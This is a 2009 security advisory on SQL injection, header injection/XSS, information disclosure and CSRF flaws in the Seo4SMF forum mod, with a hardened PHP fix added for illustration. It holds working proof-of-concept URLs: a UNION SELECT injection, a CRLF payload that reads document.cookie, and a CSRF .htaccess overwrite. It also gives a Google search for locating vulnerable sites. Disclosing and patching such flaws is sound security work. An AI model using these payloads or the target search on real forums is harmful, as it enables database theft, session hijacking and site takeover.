Seo4SMF for SMF forums - Multiple Vulnerabilities

11 Jan 2009 00:00:00. Reported by WHK. Type: exploitdb (source: www.exploit-db.com)

SQL Injection and XSS Vulnerabilities in SEO4SMF for SMF Forum

Code
[1] SQL injection

Lines 50 to 63
// $topic comes straight from $_GET['t'] (see lines 7 to 13) and is interpolated unquoted and unescaped
$query = db_query("
SELECT m.ID_TOPIC, m.subject, b.ID_BOARD, b.name
FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b
WHERE m.ID_TOPIC = $topic
AND m.ID_BOARD = b.ID_BOARD
LIMIT 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Lines 105 to 108
// $board is taken from $_GET['b'] without validation
$query = db_query("
SELECT name FROM {$db_prefix}boards AS b
WHERE ID_BOARD = $board
LIMIT 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Line 125
// $user is taken from $_GET['u'] and concatenated directly into the query
$request = db_query("SELECT memberName FROM {$db_prefix}members where
ID_MEMBER=".$user." limit 1", __FILE__, __LINE__);

------------------------------------------------------------------------

Line 143
// $tpage is taken from $_GET['p'] and concatenated directly into the query
$request = db_query("SELECT subject FROM {$db_prefix}tp_articles where
id=".$tpage." limit 1", __FILE__, __LINE__);

Where:

Lines 7 to 13
$topic = $_GET['t'];
$board = $_GET['b'];
$other = $_GET['o'];
$user = $_GET['u'];
$tpage = $_GET['p'];
$action = $_GET['a'];
$param = $_GET['param'];


Now execute the proof of concept:
http://localhost/smf/seo4smf-redirect.php?t=-1 union select 1,2,3…(numero de columnas)…,concat(username(),database()) –
GoogleDorks: http://www.google.cl/search?hl=es&q=allinurl%3Aseo4smf-redirect.php&btnG=Buscar+con+Google&meta=

[2] Header injection, cross-site scripting and path disclosure:
Source:

// $url is built from the request parameters above and is not validated before it reaches header()
if(!empty($url)){
header('HTTP/1.1 301 Moved Permanently');
header('Location: '.$url);
exit;
}


The proof of concept:
http://localhost/seo4smf-redirect.php?a=x%0DLocation:%20javascript:alert(document.cookie);
Real test: http://www.jccharry.com/archivos_publicos/xss_seo4smf.png
Alternatively, the error can be triggered so that it prints the server path (path disclosure).

[3] Disclosure in topics:
http://localhost/seo4smf-redirect.php?t=[number 1 to total topics].new/topicseen
This returns the names of private boards and topics.

[4] Cross-site request forgery and injection of arbitrary code
Source:
// No session/CSRF token and no permission check before the file is written
if (isset($_POST['htaccess']))
{
$htaccess = stripslashes($_POST['htaccess']);

//str_replace("\\\\","\\",$htaccess);
file_put_contents($boarddir."/.htaccess", $htaccess);
}
CSRF -> .htaccess rewritten -> pwned!
The same applies to the XML files.
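A hardened version of the three code paths above ([1], [2] and [4]), added here as an illustration rather than code from the mod or its author. It assumes the SMF 1.x globals and db_query() wrapper shown in the advisory, plus SMF's own checkSession(), allowedTo() and fatal_error() helpers being loaded (for example via SSI.php).

```php
<?php
// Added example, not Seo4SMF's own code: safer handling of the three input
// paths the advisory describes. $db_prefix, $boarddir and db_query() are the
// SMF 1.x globals/wrapper shown above; checkSession(), allowedTo() and
// fatal_error() are SMF 1.x core helpers assumed to be loaded.

// [1] Cast every ID taken from the query string to int before it is
//     interpolated, so "t=-1 union select ..." becomes just the integer -1.
$topic = isset($_GET['t']) ? (int) $_GET['t'] : 0;
$board = isset($_GET['b']) ? (int) $_GET['b'] : 0;
$user  = isset($_GET['u']) ? (int) $_GET['u'] : 0;
$tpage = isset($_GET['p']) ? (int) $_GET['p'] : 0;

$query = db_query("
    SELECT m.ID_TOPIC, m.subject, b.ID_BOARD, b.name
    FROM {$db_prefix}messages AS m, {$db_prefix}boards AS b
    WHERE m.ID_TOPIC = $topic
        AND m.ID_BOARD = b.ID_BOARD
    LIMIT 1", __FILE__, __LINE__);

// [2] Only redirect to a site-relative path made of safe characters.
//     CR and LF are outside the allowed set, so no extra header line can be
//     injected, and the leading "/(?!/)" rejects protocol-relative //host
//     targets (open redirect). Returns false instead of redirecting otherwise.
function safe_redirect($url)
{
    if (!preg_match('~^/(?!/)[A-Za-z0-9_./?=&#%-]*$~', $url)) {
        return false;   // caller should fall back to the forum index
    }
    header('HTTP/1.1 301 Moved Permanently');
    header('Location: ' . $url);
    exit;
}

// [4] A state-changing POST must be bound to the admin's session token and
//     gated by a permission check; without both, any page the admin visits
//     can submit the form on their behalf.
if (isset($_POST['htaccess'])) {
    checkSession('post');               // dies unless the session token matches
    if (!allowedTo('admin_forum')) {
        fatal_error('Not allowed.', false);
    }
    file_put_contents($boarddir . '/.htaccess', stripslashes($_POST['htaccess']));
}
```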

Exploits and more at:
http://foro.elhacker.net/bugs_y_exploits/falla_en_el_mod_seo4smf_para_smf-t241029.0.html
and
http://www.jccharry.com/blog/2009/01/09/whk_fallas-criticas-en-seo4smf-para-foros-smf-simplemachines-forum.html

-={[unica_inc, some day we will be together]}=-

# milw0rm.com [2009-01-11]
